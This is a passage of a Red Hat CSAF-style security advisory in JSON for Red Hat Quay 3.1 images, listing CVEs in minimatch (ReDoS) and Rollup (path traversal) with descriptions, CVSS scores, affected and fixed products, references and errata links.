"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
